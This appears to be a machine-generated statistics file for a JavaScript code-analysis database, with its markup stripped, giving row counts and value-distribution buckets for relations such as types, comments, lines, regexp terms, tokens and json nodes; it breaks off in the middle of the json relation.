- -3584 -3585 -1 - - -7878 -7879 -1 - - -19885 -19886 -1 - - -34695 -34696 -1 - - -37344 -37345 -1 - - - - - - - - -signature_parameter_name -69668 - - -sig -34695 - - -index -20 - - -name -4071 - - - - -sig -index - - -12 - - -1 -2 -14810 - - -2 -3 -12007 - - -3 -4 -4294 - - -4 -7 -3055 - - -7 -21 -529 - - - - - - -sig -name - - -12 - - -1 -2 -14810 - - -2 -3 -12007 - - -3 -4 -4294 - - -4 -7 -3055 - - -7 -21 -529 - - - - - - -index -sig - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -1 - - -6 -7 -1 - - -17 -18 -1 - - -22 -23 -1 - - -26 -27 -1 - - -37 -38 -1 - - -45 -46 -1 - - -91 -92 -1 - - -219 -220 -1 - - -529 -530 -1 - - -1042 -1043 -1 - - -1574 -1575 -1 - - -3584 -3585 -1 - - -7878 -7879 -1 - - -19885 -19886 -1 - - -34695 -34696 -1 - - - - - - -index -name - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -2 - - -11 -12 -1 - - -16 -17 -1 - 
- -18 -19 -1 - - -24 -25 -1 - - -30 -31 -1 - - -45 -46 -1 - - -63 -64 -1 - - -116 -117 -1 - - -188 -189 -1 - - -344 -345 -1 - - -605 -606 -1 - - -1092 -1093 -1 - - -1741 -1742 -1 - - -2122 -2123 -1 - - - - - - -name -sig - - -12 - - -1 -2 -1898 - - -2 -3 -700 - - -3 -4 -294 - - -4 -5 -262 - - -5 -8 -310 - - -8 -24 -309 - - -24 -3588 -298 - - - - - - -name -index - - -12 - - -1 -2 -2804 - - -2 -3 -738 - - -3 -4 -290 - - -4 -15 -239 - - - - - - - - -number_index_type -2038 - - -baseType -2038 - - -propertyType -517 - - - - -baseType -propertyType - - -12 - - -1 -2 -2038 - - - - - - -propertyType -baseType - - -12 - - -1 -2 -435 - - -2 -3 -70 - - -3 -1259 -12 - - - - - - - - -string_index_type -1102 - - -baseType -1102 - - -propertyType -256 - - - - -baseType -propertyType - - -12 - - -1 -2 -1102 - - - - - - -propertyType -baseType - - -12 - - -1 -2 -219 - - -2 -3 -20 - - -3 -436 -17 - - - - - - - - -base_type_names -941 - - -typeName -928 - - -baseTypeName -369 - - - - -typeName -baseTypeName - - -12 - - -1 -2 -917 - - -2 -4 -11 - - - - - - -baseTypeName -typeName - - -12 - - -1 -2 -175 - - -2 -3 -101 - - -3 -4 -29 - - -4 -5 -29 - - -5 -11 -28 - - -15 -41 -7 - - - - - - - - -self_types -19632 - - -typeName -14119 - - -selfType -19632 - - - - -typeName -selfType - - -12 - - -1 -2 -10451 - - -2 -3 -1823 - - -3 -4 -1845 - - - - - - -selfType -typeName - - -12 - - -1 -2 -19632 - - - - - - - - -tuple_type_min_length -241 - - -typ -241 - - -minLength -10 - - - - -typ -minLength - - -12 - - -1 -2 -241 - - - - - - -minLength -typ - - -12 - - -2 -3 -3 - - -3 -4 -1 - - -4 -5 -1 - - -7 -8 -1 - - -20 -21 -1 - - -42 -43 -1 - - -66 -67 -1 - - -93 -94 -1 - - - - - - - - -tuple_type_rest_index -6 - - -typ -6 - - -index -2 - - - - -typ -index - - -12 - - -1 -2 -6 - - - - - - -index -typ - - -12 - - -1 -2 -1 - - -5 -6 -1 - - - - - - - - -comments -id -104947 - - -id -104947 - - -kind -5 - - -toplevel -4497 - - -text -73454 - - -tostring -57955 - - - - -id -kind - - -12 - - -1 -2 
-104947 - - - - - - -id -toplevel - - -12 - - -1 -2 -104947 - - - - - - -id -text - - -12 - - -1 -2 -104947 - - - - - - -id -tostring - - -12 - - -1 -2 -104947 - - - - - - -kind -id - - -12 - - -1 -2 -2 - - -8834 -8835 -1 - - -19270 -19271 -1 - - -76841 -76842 -1 - - - - - - -kind -toplevel - - -12 - - -1 -2 -2 - - -1705 -1706 -1 - - -3107 -3108 -1 - - -3141 -3142 -1 - - - - - - -kind -text - - -12 - - -1 -2 -2 - - -4893 -4894 -1 - - -12759 -12760 -1 - - -55810 -55811 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -2 - - -1739 -1740 -1 - - -2536 -2537 -1 - - -53678 -53679 -1 - - - - - - -toplevel -id - - -12 - - -1 -2 -1034 - - -2 -3 -512 - - -3 -4 -332 - - -4 -5 -260 - - -5 -7 -388 - - -7 -10 -401 - - -10 -14 -354 - - -14 -21 -365 - - -21 -36 -338 - - -36 -99 -339 - - -99 -6350 -174 - - - - - - -toplevel -kind - - -12 - - -1 -2 -1856 - - -2 -3 -1824 - - -3 -4 -817 - - - - - - -toplevel -text - - -12 - - -1 -2 -1043 - - -2 -3 -533 - - -3 -4 -341 - - -4 -5 -266 - - -5 -7 -396 - - -7 -9 -315 - - -9 -13 -388 - - -13 -20 -385 - - -20 -35 -344 - - -35 -103 -344 - - -103 -4413 -142 - - - - - - -toplevel -tostring - - -12 - - -1 -2 -1054 - - -2 -3 -571 - - -3 -4 -374 - - -4 -5 -297 - - -5 -6 -232 - - -6 -8 -363 - - -8 -11 -345 - - -11 -16 -366 - - -16 -27 -352 - - -27 -60 -338 - - -60 -4394 -205 - - - - - - -text -id - - -12 - - -1 -2 -59626 - - -2 -3 -10314 - - -3 -1417 -3514 - - - - - - -text -kind - - -12 - - -1 -2 -73446 - - -2 -5 -8 - - - - - - -text -toplevel - - -12 - - -1 -2 -62696 - - -2 -3 -8455 - - -3 -257 -2303 - - - - - - -text -tostring - - -12 - - -1 -2 -73446 - - -2 -5 -8 - - - - - - -tostring -id - - -12 - - -1 -2 -44781 - - -2 -3 -9203 - - -3 -4589 -3971 - - - - - - -tostring -kind - - -12 - - -1 -2 -57955 - - - - - - -tostring -toplevel - - -12 - - -1 -2 -48252 - - -2 -3 -7233 - - -3 -513 -2470 - - - - - - -tostring -text - - -12 - - -1 -2 -55262 - - -2 -3403 -2693 - - - - - - - - -types -179398 - - -id -179398 - - -kind -9 - - -tostring -40918 - - - 
- -id -kind - - -12 - - -1 -2 -179398 - - - - - - -id -tostring - - -12 - - -1 -2 -179398 - - - - - - -kind -id - - -12 - - -1 -2 -5 - - -1802 -1803 -1 - - -6109 -6110 -1 - - -12383 -12384 -1 - - -159099 -159100 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -50 -51 -1 - - -745 -746 -1 - - -7464 -7465 -1 - - -32936 -32937 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -22482 - - -2 -3 -8025 - - -3 -4 -3362 - - -4 -7 -3387 - - -7 -33 -3070 - - -33 -7284 -592 - - - - - - -tostring -kind - - -12 - - -1 -2 -40638 - - -2 -4 -280 - - - - - - - - -type_child -17410 - - -child -9118 - - -parent -7772 - - -idx -296 - - - - -child -parent - - -12 - - -1 -2 -7113 - - -2 -3 -978 - - -3 -8 -686 - - -8 -199 -341 - - - - - - -child -idx - - -12 - - -1 -2 -8255 - - -2 -5 -726 - - -5 -19 -137 - - - - - - -parent -child - - -12 - - -1 -2 -5433 - - -2 -3 -1746 - - -3 -288 -583 - - -288 -297 -10 - - - - - - -parent -idx - - -12 - - -1 -2 -5422 - - -2 -3 -1757 - - -3 -288 -583 - - -288 -297 -10 - - - - - - -idx -child - - -12 - - -1 -2 -1 - - -2 -3 -39 - - -3 -4 -3 - - -4 -5 -61 - - -5 -6 -37 - - -6 -7 -56 - - -7 -12 -22 - - -12 -14 -18 - - -14 -15 -44 - - -17 -6068 -15 - - - - - - -idx -parent - - -12 - - -2 -15 -13 - - -15 -16 -90 - - -19 -20 -81 - - -20 -23 -3 - - -23 -24 -75 - - -24 -55 -23 - - -55 -7773 -11 - - - - - - - - -ast_node_type -1261889 - - -node -1261889 - - -typ -72602 - - - - -node -typ - - -12 - - -1 -2 -1261889 - - - - - - -typ -node - - -12 - - -1 -2 -39248 - - -2 -3 -8371 - - -3 -4 -7888 - - -4 -5 -3053 - - -5 -8 -6417 - - -8 -28 -5528 - - -28 -588233 -2097 - - - - - - - - -declared_function_signature -62664 - - -node -62664 - - -sig -21731 - - - - -node -sig - - -12 - - -1 -2 -62664 - - - - - - -sig -node - - -12 - - -1 -2 -16826 - - -2 -3 -2358 - - -3 -6 -1683 - - -6 -10251 -864 - - - - - - - - -invoke_expr_signature -140668 - - -node -140668 - - -sig -9111 - - - - -node -sig - - -12 - - -1 -2 -140668 - - - - - - -sig -node - - -12 - - -1 -2 -4612 - - 
-2 -3 -1819 - - -3 -4 -737 - - -4 -6 -696 - - -6 -14 -705 - - -14 -68351 -542 - - - - - - - - -invoke_expr_overload_index -73550 - - -node -73550 - - -index -47 - - - - -node -index - - -12 - - -1 -2 -73550 - - - - - - -index -node - - -12 - - -1 -2 -17 - - -2 -3 -7 - - -3 -5 -4 - - -5 -6 -4 - - -6 -8 -3 - - -8 -16 -4 - - -27 -155 -4 - - -211 -68535 -4 - - - - - - - - -symbols -10192 - - -id -10192 - - -kind -3 - - -name -7872 - - - - -id -kind - - -12 - - -1 -2 -10192 - - - - - - -id -name - - -12 - - -1 -2 -10192 - - - - - - -kind -id - - -12 - - -584 -585 -1 - - -2385 -2386 -1 - - -7223 -7224 -1 - - - - - - -kind -name - - -12 - - -30 -31 -1 - - -2385 -2386 -1 - - -5609 -5610 -1 - - - - - - -name -id - - -12 - - -1 -2 -6929 - - -2 -3 -533 - - -3 -273 -410 - - - - - - -name -kind - - -12 - - -1 -2 -7730 - - -2 -4 -142 - - - - - - - - -symbol_parent -7807 - - -symbol -7807 - - -parent -1727 - - - - -symbol -parent - - -12 - - -1 -2 -7807 - - - - - - -parent -symbol - - -12 - - -1 -2 -778 - - -2 -3 -304 - - -3 -4 -212 - - -4 -5 -111 - - -5 -8 -152 - - -8 -26 -136 - - -26 -297 -34 - - - - - - - - -symbol_module -100 - - -symbol -97 - - -moduleName -98 - - - - -symbol -moduleName - - -12 - - -1 -2 -95 - - -2 -4 -2 - - - - - - -moduleName -symbol - - -12 - - -1 -2 -96 - - -2 -3 -2 - - - - - - - - -symbol_global -354 - - -symbol -354 - - -globalName -350 - - - - -symbol -globalName - - -12 - - -1 -2 -354 - - - - - - -globalName -symbol - - -12 - - -1 -2 -347 - - -2 -4 -3 - - - - - - - - -ast_node_symbol -8173 - - -node -8173 - - -symbol -8155 - - - - -node -symbol - - -12 - - -1 -2 -8173 - - - - - - -symbol -node - - -12 - - -1 -2 -8147 - - -2 -12 -8 - - - - - - - - -type_symbol -12383 - - -typ -12383 - - -symbol -6743 - - - - -typ -symbol - - -12 - - -1 -2 -12383 - - - - - - -symbol -typ - - -12 - - -1 -2 -6240 - - -2 -3070 -503 - - - - - - - - -type_property -331170 - - -typ -49305 - - -name -22420 - - -propertyType -130857 - - - - -typ -name - - -12 - - -1 -2 -10275 
- - -2 -3 -14770 - - -3 -4 -6020 - - -4 -5 -3153 - - -5 -6 -1700 - - -6 -7 -4257 - - -7 -19 -3783 - - -19 -23 -3833 - - -23 -1390 -1514 - - - - - - -typ -propertyType - - -12 - - -1 -2 -19351 - - -2 -3 -10786 - - -3 -4 -5073 - - -4 -6 -2639 - - -6 -7 -3864 - - -7 -22 -3334 - - -22 -33 -3710 - - -33 -1390 -548 - - - - - - -name -typ - - -12 - - -1 -2 -4735 - - -2 -3 -7379 - - -3 -4 -2728 - - -4 -5 -1467 - - -5 -7 -1481 - - -7 -11 -1878 - - -11 -30 -1682 - - -30 -7825 -1070 - - - - - - -name -propertyType - - -12 - - -1 -2 -14690 - - -2 -3 -2698 - - -3 -4 -1925 - - -4 -8 -1697 - - -8 -3373 -1410 - - - - - - -propertyType -typ - - -12 - - -1 -2 -112801 - - -2 -3 -12999 - - -3 -19440 -5057 - - - - - - -propertyType -name - - -12 - - -1 -2 -129508 - - -2 -3475 -1349 - - - - - - - - -lines -id -1622184 - - -id -1622184 - - -toplevel -5312 - - -text -648122 - - -terminator -6 - - - - -id -toplevel - - -12 - - -1 -2 -1622184 - - - - - - -id -text - - -12 - - -1 -2 -1622184 - - - - - - -id -terminator - - -12 - - -1 -2 -1622184 - - - - - - -toplevel -id - - -12 - - -1 -12 -425 - - -12 -24 -415 - - -24 -37 -419 - - -37 -50 -404 - - -50 -66 -411 - - -66 -85 -400 - - -85 -108 -405 - - -108 -138 -402 - - -138 -174 -402 - - -174 -232 -405 - - -232 -331 -399 - - -331 -547 -399 - - -548 -4700 -399 - - -4783 -277404 -27 - - - - - - -toplevel -text - - -12 - - -1 -11 -441 - - -11 -21 -427 - - -21 -30 -414 - - -30 -40 -452 - - -40 -51 -435 - - -51 -64 -413 - - -64 -79 -404 - - -79 -96 -401 - - -96 -121 -400 - - -121 -158 -401 - - -158 -220 -399 - - -220 -387 -401 - - -388 -60934 -324 - - - - - - -toplevel -terminator - - -12 - - -1 -2 -5046 - - -2 -6 -266 - - - - - - -text -id - - -12 - - -1 -2 -513961 - - -2 -3 -84265 - - -3 -49 -48993 - - -49 -175121 -903 - - - - - - -text -toplevel - - -12 - - -1 -2 -569267 - - -2 -3 -56143 - - -3 -5068 -22712 - - - - - - -text -terminator - - -12 - - -1 -2 -647931 - - -2 -4 -191 - - - - - - -terminator -id - - -12 - - -3 -4 -3 - - -349 -350 -1 - 
- -1830 -1831 -1 - - -1619996 -1619997 -1 - - - - - - -terminator -toplevel - - -12 - - -3 -4 -3 - - -11 -12 -1 - - -349 -350 -1 - - -5218 -5219 -1 - - - - - - -terminator -text - - -12 - - -1 -2 -3 - - -110 -111 -1 - - -1093 -1094 -1 - - -647111 -647112 -1 - - - - - - - - -indentation -1145010 - - -file -5728 - - -lineno -40788 - - -indentChar -2 - - -indentDepth -72 - - - - -file -lineno - - -12 - - -1 -9 -440 - - -9 -18 -471 - - -18 -29 -439 - - -29 -41 -451 - - -41 -54 -460 - - -54 -71 -442 - - -71 -91 -441 - - -91 -118 -430 - - -118 -152 -432 - - -152 -205 -434 - - -205 -295 -431 - - -295 -503 -430 - - -503 -38151 -427 - - - - - - -file -indentChar - - -12 - - -1 -2 -5692 - - -2 -3 -36 - - - - - - -file -indentDepth - - -12 - - -1 -2 -287 - - -2 -3 -401 - - -3 -4 -665 - - -4 -5 -815 - - -5 -6 -814 - - -6 -7 -687 - - -7 -8 -567 - - -8 -9 -390 - - -9 -11 -503 - - -11 -17 -462 - - -17 -67 -137 - - - - - - -lineno -file - - -12 - - -1 -2 -10935 - - -2 -3 -5303 - - -3 -4 -12061 - - -4 -6 -3644 - - -6 -13 -3223 - - -13 -31 -3090 - - -31 -3986 -2532 - - - - - - -lineno -indentChar - - -12 - - -1 -2 -38720 - - -2 -3 -2068 - - - - - - -lineno -indentDepth - - -12 - - -1 -2 -11626 - - -2 -3 -7847 - - -3 -4 -10434 - - -4 -5 -2688 - - -5 -8 -3316 - - -8 -13 -3144 - - -13 -39 -1733 - - - - - - -indentChar -file - - -12 - - -42 -43 -1 - - -5722 -5723 -1 - - - - - - -indentChar -lineno - - -12 - - -2068 -2069 -1 - - -40788 -40789 -1 - - - - - - -indentChar -indentDepth - - -12 - - -10 -11 -1 - - -72 -73 -1 - - - - - - -indentDepth -file - - -12 - - -1 -6 -6 - - -6 -9 -6 - - -9 -20 -6 - - -21 -30 -6 - - -38 -57 -6 - - -59 -90 -6 - - -90 -124 -6 - - -132 -160 -6 - - -165 -211 -6 - - -213 -337 -6 - - -377 -1532 -6 - - -1919 -5487 -6 - - - - - - -indentDepth -lineno - - -12 - - -2 -8 -6 - - -11 -19 -6 - - -25 -44 -6 - - -53 -67 -6 - - -67 -89 -6 - - -102 -169 -6 - - -183 -239 -6 - - -269 -411 -6 - - -417 -971 -6 - - -1129 -2732 -6 - - -4374 -9301 -6 - - -11828 -21226 -6 - - - - 
- - -indentDepth -indentChar - - -12 - - -1 -2 -62 - - -2 -3 -10 - - - - - - - - -js_parse_errors -3 - - -id -3 - - -toplevel -3 - - -message -1 - - -line -3 - - - - -id -toplevel - - -12 - - -1 -2 -3 - - - - - - -id -message - - -12 - - -1 -2 -3 - - - - - - -id -line - - -12 - - -1 -2 -3 - - - - - - -toplevel -id - - -12 - - -1 -2 -3 - - - - - - -toplevel -message - - -12 - - -1 -2 -3 - - - - - - -toplevel -line - - -12 - - -1 -2 -3 - - - - - - -message -id - - -12 - - -3 -4 -1 - - - - - - -message -toplevel - - -12 - - -3 -4 -1 - - - - - - -message -line - - -12 - - -3 -4 -1 - - - - - - -line -id - - -12 - - -1 -2 -3 - - - - - - -line -toplevel - - -12 - - -1 -2 -3 - - - - - - -line -message - - -12 - - -1 -2 -3 - - - - - - - - -regexpterm -id -33197 - - -id -33197 - - -kind -25 - - -parent -13313 - - -idx -76 - - -tostring -4610 - - - - -id -kind - - -12 - - -1 -2 -33197 - - - - - - -id -parent - - -12 - - -1 -2 -33197 - - - - - - -id -idx - - -12 - - -1 -2 -33197 - - - - - - -id -tostring - - -12 - - -1 -2 -33197 - - - - - - -kind -id - - -12 - - -1 -4 -2 - - -7 -12 -2 - - -12 -16 -2 - - -59 -100 -2 - - -146 -265 -2 - - -445 -479 -2 - - -599 -620 -2 - - -637 -642 -2 - - -826 -1058 -2 - - -1067 -1474 -2 - - -1573 -1693 -2 - - -2613 -3372 -2 - - -15489 -15490 -1 - - - - - - -kind -parent - - -12 - - -1 -4 -2 - - -7 -8 -1 - - -11 -12 -2 - - -15 -46 -2 - - -79 -132 -2 - - -132 -331 -2 - - -367 -381 -2 - - -437 -638 -2 - - -641 -737 -2 - - -825 -1005 -2 - - -1391 -1403 -2 - - -1465 -1645 -2 - - -2691 -3963 -2 - - - - - - -kind -idx - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -4 -5 -3 - - -6 -8 -2 - - -12 -15 -2 - - -17 -19 -2 - - -19 -21 -2 - - -22 -23 -1 - - -23 -24 -2 - - -25 -27 -2 - - -27 -30 -2 - - -42 -49 -2 - - -73 -74 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -6 - - -2 -5 -2 - - -6 -11 -2 - - -13 -28 -2 - - -31 -59 -2 - - -65 -78 -2 - - -100 -118 -2 - - -149 -171 -2 - - -175 -391 -2 - - -433 -791 -2 - - -1992 -1993 -1 - - - - - - -parent -id - - -12 - - -1 
-2 -7691 - - -2 -3 -2568 - - -3 -4 -924 - - -4 -7 -1189 - - -7 -77 -941 - - - - - - -parent -kind - - -12 - - -1 -2 -10080 - - -2 -3 -2026 - - -3 -5 -1068 - - -5 -9 -139 - - - - - - -parent -idx - - -12 - - -1 -2 -7691 - - -2 -3 -2568 - - -3 -4 -924 - - -4 -7 -1189 - - -7 -77 -941 - - - - - - -parent -tostring - - -12 - - -1 -2 -7733 - - -2 -3 -2644 - - -3 -4 -940 - - -4 -7 -1230 - - -7 -32 -766 - - - - - - -idx -id - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -4 -8 -7 - - -8 -13 -7 - - -15 -22 -6 - - -26 -35 -5 - - -37 -51 -6 - - -53 -75 -6 - - -79 -141 -6 - - -186 -325 -6 - - -385 -1182 -6 - - -1578 -13314 -5 - - - - - - -idx -kind - - -12 - - -1 -2 -18 - - -2 -3 -15 - - -3 -4 -8 - - -4 -5 -7 - - -5 -8 -6 - - -9 -13 -6 - - -13 -16 -7 - - -17 -20 -7 - - -21 -25 -2 - - - - - - -idx -parent - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -4 -8 -7 - - -8 -13 -7 - - -15 -22 -6 - - -26 -35 -5 - - -37 -51 -6 - - -53 -75 -6 - - -79 -141 -6 - - -186 -325 -6 - - -385 -1182 -6 - - -1578 -13314 -5 - - - - - - -idx -tostring - - -12 - - -1 -2 -8 - - -2 -3 -8 - - -3 -4 -4 - - -5 -7 -6 - - -7 -10 -6 - - -10 -15 -6 - - -16 -21 -7 - - -21 -26 -6 - - -29 -48 -6 - - -48 -75 -6 - - -82 -147 -6 - - -158 -940 -6 - - -3258 -3259 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -3026 - - -2 -3 -751 - - -3 -5 -391 - - -5 -49 -346 - - -49 -1013 -96 - - - - - - -tostring -kind - - -12 - - -1 -2 -4605 - - -2 -3 -5 - - - - - - -tostring -parent - - -12 - - -1 -2 -3041 - - -2 -3 -746 - - -3 -5 -389 - - -5 -53 -346 - - -54 -875 -88 - - - - - - -tostring -idx - - -12 - - -1 -2 -4102 - - -2 -5 -351 - - -5 -58 -157 - - - - - - - - -regexp_parse_errors -id -122 - - -id -122 - - -regexp -41 - - -message -5 - - - - -id -regexp - - -12 - - -1 -2 -122 - - - - - - -id -message - - -12 - - -1 -2 -122 - - - - - - -regexp -id - - -12 - - -1 -2 -7 - - -2 -3 -9 - - -3 -4 -12 - - -4 -5 -5 - - -5 -6 -7 - - -6 -7 -1 - - - - - - -regexp -message - - -12 - - -1 -2 -18 - - -2 -3 -4 - - -3 -4 -19 - - - - - - -message -id - - -12 - - 
-1 -2 -1 - - -8 -9 -1 - - -22 -23 -1 - - -23 -24 -1 - - -68 -69 -1 - - - - - - -message -regexp - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -22 -23 -1 - - -23 -24 -1 - - -35 -36 -1 - - - - - - - - -is_greedy -2629 - - -id -2629 - - - - - -isOptionalChaining -100 - - -id -100 - - - - - - -range_quantifier_lower_bound -146 - - -id -146 - - -lo -11 - - - - -id -lo - - -12 - - -1 -2 -146 - - - - - - -lo -id - - -12 - - -1 -2 -4 - - -4 -5 -1 - - -5 -6 -1 - - -17 -18 -1 - - -20 -21 -1 - - -28 -29 -1 - - -33 -34 -1 - - -35 -36 -1 - - - - - - - - -range_quantifier_upper_bound -45 - - -id -45 - - -hi -13 - - - - -id -hi - - -12 - - -1 -2 -45 - - - - - - -hi -id - - -12 - - -1 -2 -5 - - -2 -3 -3 - - -3 -4 -2 - - -8 -9 -1 - - -9 -10 -1 - - -11 -12 -1 - - - - - - - - -is_capture -1280 - - -id -1280 - - -number -14 - - - - -id -number - - -12 - - -1 -2 -1280 - - - - - - -number -id - - -12 - - -1 -2 -1 - - -2 -3 -2 - - -4 -5 -2 - - -6 -7 -2 - - -7 -8 -1 - - -12 -13 -1 - - -23 -24 -1 - - -55 -56 -1 - - -108 -109 -1 - - -276 -277 -1 - - -774 -775 -1 - - - - - - - - -is_named_capture -1280 - - -id -1280 - - -name -14 - - - - -id -name - - -12 - - -1 -2 -1280 - - - - - - -name -id - - -12 - - -1 -2 -1 - - -2 -3 -2 - - -4 -5 -2 - - -6 -7 -2 - - -7 -8 -1 - - -12 -13 -1 - - -23 -24 -1 - - -55 -56 -1 - - -108 -109 -1 - - -276 -277 -1 - - -774 -775 -1 - - - - - - - - -is_inverted -458 - - -id -458 - - - - - -regexp_const_value -19032 - - -id -19032 - - -value -237 - - - - -id -value - - -12 - - -1 -2 -19032 - - - - - - -value -id - - -12 - - -1 -2 -80 - - -2 -3 -12 - - -3 -4 -10 - - -4 -5 -20 - - -5 -17 -18 - - -17 -30 -18 - - -30 -66 -18 - - -68 -143 -18 - - -155 -242 -18 - - -251 -555 -18 - - -581 -1013 -7 - - - - - - - - -char_class_escape -1573 - - -id -1573 - - -value -6 - - - - -id -value - - -12 - - -1 -2 -1573 - - - - - - -value -id - - -12 - - -11 -12 -1 - - -14 -15 -1 - - -92 -93 -1 - - -199 -200 -1 - - -378 -379 -1 - - -879 -880 -1 - - - - - - - - -unicode_property_escapename -1573 
- - -id -1573 - - -name -6 - - - - -id -name - - -12 - - -1 -2 -1573 - - - - - - -name -id - - -12 - - -11 -12 -1 - - -14 -15 -1 - - -92 -93 -1 - - -199 -200 -1 - - -378 -379 -1 - - -879 -880 -1 - - - - - - - - -unicode_property_escapevalue -1573 - - -id -1573 - - -value -6 - - - - -id -value - - -12 - - -1 -2 -1573 - - - - - - -value -id - - -12 - - -11 -12 -1 - - -14 -15 -1 - - -92 -93 -1 - - -199 -200 -1 - - -378 -379 -1 - - -879 -880 -1 - - - - - - - - -backref -11 - - -id -11 - - -value -4 - - - - -id -value - - -12 - - -1 -2 -11 - - - - - - -value -id - - -12 - - -1 -2 -2 - - -3 -4 -1 - - -6 -7 -1 - - - - - - - - -named_backref -11 - - -id -11 - - -name -4 - - - - -id -name - - -12 - - -1 -2 -11 - - - - - - -name -id - - -12 - - -1 -2 -2 - - -3 -4 -1 - - -6 -7 -1 - - - - - - - - -tokeninfo -id -8770869 - - -id -8770869 - - -kind -9 - - -toplevel -5312 - - -idx -1581031 - - -value -234179 - - - - -id -kind - - -12 - - -1 -2 -8770869 - - - - - - -id -toplevel - - -12 - - -1 -2 -8770869 - - - - - - -id -idx - - -12 - - -1 -2 -8770869 - - - - - - -id -value - - -12 - - -1 -2 -8770869 - - - - - - -kind -id - - -12 - - -2773 -2774 -1 - - -5312 -5313 -1 - - -15526 -15527 -1 - - -31654 -31655 -1 - - -269555 -269556 -1 - - -551767 -551768 -1 - - -557620 -557621 -1 - - -2268328 -2268329 -1 - - -5068334 -5068335 -1 - - - - - - -kind -toplevel - - -12 - - -471 -472 -1 - - -2204 -2205 -1 - - -2851 -2852 -1 - - -3204 -3205 -1 - - -5089 -5090 -1 - - -5219 -5220 -1 - - -5294 -5295 -1 - - -5300 -5301 -1 - - -5312 -5313 -1 - - - - - - -kind -idx - - -12 - - -1949 -1950 -1 - - -2130 -2131 -1 - - -8409 -8410 -1 - - -12883 -12884 -1 - - -51181 -51182 -1 - - -130388 -130389 -1 - - -409369 -409370 -1 - - -583910 -583911 -1 - - -1104589 -1104590 -1 - - - - - - -kind -value - - -12 - - -1 -2 -2 - - -2 -3 -1 - - -34 -35 -1 - - -52 -53 -1 - - -1596 -1597 -1 - - -59827 -59828 -1 - - -85214 -85215 -1 - - -87463 -87464 -1 - - - - - - -toplevel -id - - -12 - - -1 -45 -403 - - -45 -95 -408 
- - -95 -149 -399 - - -149 -212 -408 - - -212 -291 -405 - - -291 -362 -399 - - -362 -461 -401 - - -461 -585 -399 - - -585 -756 -399 - - -756 -1013 -399 - - -1013 -1389 -399 - - -1389 -2313 -400 - - -2320 -6681 -399 - - -6717 -1581032 -94 - - - - - - -toplevel -kind - - -12 - - -1 -5 -174 - - -5 -6 -1046 - - -6 -7 -1326 - - -7 -8 -1279 - - -8 -9 -1214 - - -9 -10 -273 - - - - - - -toplevel -idx - - -12 - - -1 -45 -403 - - -45 -95 -408 - - -95 -149 -399 - - -149 -212 -408 - - -212 -291 -405 - - -291 -362 -399 - - -362 -461 -401 - - -461 -585 -399 - - -585 -756 -399 - - -756 -1013 -399 - - -1013 -1389 -399 - - -1389 -2313 -400 - - -2320 -6681 -399 - - -6717 -1581032 -94 - - - - - - -toplevel -value - - -12 - - -1 -21 -423 - - -21 -33 -416 - - -33 -44 -424 - - -44 -55 -400 - - -55 -65 -426 - - -65 -76 -407 - - -76 -88 -426 - - -88 -102 -402 - - -102 -120 -405 - - -120 -144 -401 - - -144 -180 -400 - - -180 -260 -400 - - -260 -46630 -382 - - - - - - -idx -id - - -12 - - -1 -2 -1083847 - - -2 -3 -166188 - - -3 -6 -136823 - - -6 -9 -123495 - - -9 -5313 -70678 - - - - - - -idx -kind - - -12 - - -1 -2 -1175018 - - -2 -3 -207984 - - -3 -4 -120754 - - -4 -10 -77275 - - - - - - -idx -toplevel - - -12 - - -1 -2 -1083847 - - -2 -3 -166188 - - -3 -6 -136823 - - -6 -9 -123495 - - -9 -5313 -70678 - - - - - - -idx -value - - -12 - - -1 -2 -1089271 - - -2 -3 -165753 - - -3 -5 -104658 - - -5 -8 -145624 - - -8 -1449 -75725 - - - - - - -value -id - - -12 - - -1 -2 -104636 - - -2 -3 -47235 - - -3 -4 -20077 - - -4 -5 -16835 - - -5 -9 -19608 - - -9 -34 -17687 - - -34 -789848 -8101 - - - - - - -value -kind - - -12 - - -1 -2 -234168 - - -2 -3 -11 - - - - - - -value -toplevel - - -12 - - -1 -2 -174552 - - -2 -3 -34819 - - -3 -8 -18537 - - -8 -5313 -6271 - - - - - - -value -idx - - -12 - - -1 -2 -105969 - - -2 -3 -47057 - - -3 -4 -19986 - - -4 -5 -16682 - - -5 -9 -19402 - - -9 -36 -17686 - - -36 -347359 -7397 - - - - - - - - -next_token -104943 - - -comment -104943 - - -token -74457 - - - - 
-comment -token - - -12 - - -1 -2 -104943 - - - - - - -token -comment - - -12 - - -1 -2 -59983 - - -2 -3 -8628 - - -3 -12 -5601 - - -12 -141 -245 - - - - - - - - -json -id -1643352 - - -id -1643352 - - -kind -6 - - -parent -617634 - - -idx -159429 - - -tostring -768907 - - - - -id -kind - - -12 - - -1 -2 -1643352 - - - - - - -id -parent - - -12 - - -1 -2 -1643352 - - - - - - -id -idx - - -12 - - -1 -2 -1643352 - - - - - - -id -tostring - - -12 - - -1 -2 -1643352 - - - - - - -kind -id - - -12 - - -24 -25 -1 - - -654 -655 -1 - - -175925 -175926 -1 - - -273113 -273114 -1 - - -441281 -441282 -1 - - -752355 -752356 -1 - - - - - - -kind -parent - - -12 - - -17 -18 -1 - - -411 -412 -1 - - -165183 -165184 -1 - - -167132 -167133 -1 - - -271547 -271548 -1 - - -452264 -452265 -1 - - - - - - -kind -idx - - -12 - - -10 -11 -1 - - -65 -66 -1 - - -152 -153 -1 - - -174 -175 -1 - - -198 -199 -1 - - -159429 -159430 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -2865 -2866 -1 - - -100735 -100736 -1 - - -271467 -271468 -1 - - -393837 -393838 -1 - - - - - - -parent -id - - -12 - - -1 -2 -127476 - - -2 -3 -184044 - - -3 -4 -285109 - - -4 -159430 -21005 - - - - - - -parent -kind - - -12 - - -1 -2 -179808 - - -2 -3 -437119 - - -3 -7 -707 - - - - - - -parent -idx - - -12 - - -1 -2 -127476 - - -2 -3 -184044 - - -3 -4 -285109 - - -4 -159430 -21005 - - - - - - -parent -tostring - - -12 - - -1 